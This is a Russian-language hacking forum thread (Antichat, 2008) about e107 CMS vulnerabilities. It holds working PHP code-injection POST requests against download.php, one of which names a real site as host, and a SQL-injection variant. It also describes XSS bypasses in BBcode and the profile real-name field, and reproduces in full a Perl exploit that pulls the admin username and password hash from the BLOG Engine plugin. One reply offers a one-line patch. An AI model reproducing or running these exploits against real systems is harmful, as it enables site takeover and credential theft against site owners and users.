 |
|
11.08.2008, 19:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 178
С нами:
9731846
Репутация:
622
|
|
view=1&action=maincats&execute=aWQ=&template_load_ core=echo%20exec
(base64_decode($_POST[execute]));
при таком запросе работать не будет, наверно сделали защиту от скрипткидисов
view=1&action=list&template_load_core=phpinfo();
скуль фигня самое страшно php-injection
PHP код:
$template_load_core = ' ..... ';
....
switch ($action)
{
case 'list' :
if (isset($_POST['view'])) extract($_POST);
if ($sql->db_Select("download_category", "download_category_name,download_category_description,download_category_parent,download_category_class", "(download_category_id='{$id}') AND (download_category_class IN (".USERCLASS_LIST."))") )
{
...
eval($template_load_core);
рабочий запрос если в download.php есть хоть одна статья
Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0
User-Agent: Opera (Windows NT 5.1; U; si)
Host: www.tarotclub.fr
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
If-None-Match: c858d46e89d4dfb6fcf8add468b46abb
Cookie: e107_tdOffset=7; e107_tdSetTime=1218466444; e107_tzOffset=-240
Cookie2: $Version=1
Proxy-Connection: close
view=1&id=1&template_load_core=phpinfo();
если в download.php нет ниодной статьи и если magic_quotes_gpc OFF можно извратится таким запросом искользуя sql-injection
Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0
User-Agent: Opera (Windows NT 5.1; U; si)
Host: www.tarotclub.fr
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
If-None-Match: c858d46e89d4dfb6fcf8add468b46abb
Cookie: e107_tdOffset=7; e107_tdSetTime=1218466444; e107_tzOffset=-240
Cookie2: $Version=1
Proxy-Connection: close
view=1&id=0')/*1*/union/*1*/select/*1*/1,2,3,4/*&template_load_core=phpinfo();
ЗЫ сплойт выкладывать не стал т.к. уже не актуально в e107 апдейт работает хорошо, через пару дней уязвимых сайтов почти не останется, эту багу нашёл 10.07.08 |
|
|
18.08.2008, 23:27
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
Последний раз редактировалось Nightmarе; 18.08.2008 в 23:32..
|
|
|
|
19.08.2008, 19:08
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Nightmarе
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
А что, работает?
Я не знаю какую версию смотрели авторы, но у меня на локалке как раз заявленная ими v0.7.11_full
Так вот , всё бы хорошо работало, если-бы там был eval() , но там его нет 
И кстати. если бы он там был, никакие SQL типа:
id=0')/*1*/union/*1*/select/*1*/1,2,3,4/*
там-бы нужны не были, достаточно просто постом послать (Разумеется download.php?list):
template_load_core=phpinfo();
Я не знаю, может у меня пропатченная, или авторы смотрели старую, был бы благодарен, если-бы кто-то дал CMS с таким кодом посмотреть.
Последний раз редактировалось jokester; 19.08.2008 в 19:20..
|
|
|
|
19.08.2008, 20:25
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Вот файл:
http://slil.ru/26072120
Это из версии 7.11, с офф сайта качать бесполезно - пропатчили.
|
|
|
|
19.08.2008, 20:32
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Вот файл:
http://slil.ru/26072120
Это из версии 7.11, с офф сайта качать бесполезно - пропатчили.
И там как раз и есть эти строки:
case 'list' : // Category-based listing
if (isset($_POST['view'])) extract($_POST);
|
|
|
|
20.08.2008, 00:28
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Да, сдесь работает
download.php?list
id=1&template_load_core=phpinfo();
chekist, молодца
|
|
|
|
27.08.2008, 17:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 178
С нами:
9731846
Репутация:
622
|
|
в е107 интересные bb коды [flash=50,50]javascript :[xss][/flash],
но есть злобный фильтр
PHP код:
....
if (!preg_match('/&#|\'|"|\(|\)|<|>/s', $text))
{
....
единственное что получилось использовать location вместо кавычки использовал слеш
ЗЫ у ково получится по интереснее использовать багу отпишытесь |
|
|
|
e107 Plugin BLOG Engine v2.2 SQL Injection |
02.09.2008, 02:45
|
|
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
С нами:
9427413
Репутация:
973
|
|
e107 Plugin BLOG Engine v2.2 SQL Injection
Код:
#!/usr/bin/perl
##############################################################
# e107 Plugin BLOG Engine v2.2 SQL Injection Exploit #
# ..::virangar security team::.. #
# www.virangar.net #
# C0d3d BY:virangar security team ( hadihadi ) #
#special tnx to: #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #
#& all virangar members & all hackerz #
# my lovely friends hadi_aryaie2004 & arash(imm02tal) #
# ..:::Young Iranina Hackerz::.. #
##############################################################
use HTTP::Request;
use LWP::UserAgent;
if (@ARGV != 1){
header();
}
$site = $ARGV[0];
$attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_
id=1/*";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$attack));
$res = $req->content;
if ($res =~ /<user>(.*?)<user>/){
print "\n[+] Admin User : $1";}
if ($res =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "\n[+]Done\n";}
sub header {
print qq{
###################################################################
# e107 Plugin BLOG Engine v2.2 SQL Injection Exploit #
# www.virangar.net #
# Useage: perl $0 Host #
# #
# Host: full patch to macgurublog.php (dont forget http://) #
# #
# Example: #
# perl $0 http://site/macgurublog_menu/macgurublog.php #
# #
###################################################################
};
}
#virangar.net[2008-05-22]
# milw0rm.com [2008-09-01]
Содрано с milw0rm.com/exploits/6346 |
|
|
|
04.09.2008, 17:39
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
Active XSS
Версия: 0.7.12
Уязвимый кусок кода:/usersettings.php
PHP код:
...
$_POST['realname'] = $tp->toDB($_POST['realname']);
...
$sql->db_Update("user", "{$new_username} {$pwreset} {$sesschange} user_email='".$tp -> toDB($_POST['email'])."',user_signature='".$_POST['signature']."', user_image='".$tp -> toDB($_POST['image'])."', user_timezone='".$tp -> toDB($_POST['timezone'])."',user_hideemail='".intval($tp -> toDB($_POST['hideemail']))."', user_login='".$_POST['realname']."' {$new_customtitle}, user_xup='".$tp ->
toDB($_POST['user_xup'])."' WHERE user_id='".intval($inp)."' ");
...
Эксплоит:Profile => Click here to update your information => RealName => [Your XSS]
__________________
в строю
|
|
|
|
06.09.2008, 20:13
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
С нами:
10957346
Репутация:
2727
|
|
Сообщение от Nightmarе
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
PHP код:
switch ($action)
{
case 'list' : // Category-based listing
if (isset($_POST['view'])) extract($_POST);
PHP код:
switch ($action)
{
case 'list' : // Category-based listing
if (isset($_POST['view'])) extract($_POST, EXTR_SKIP);
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
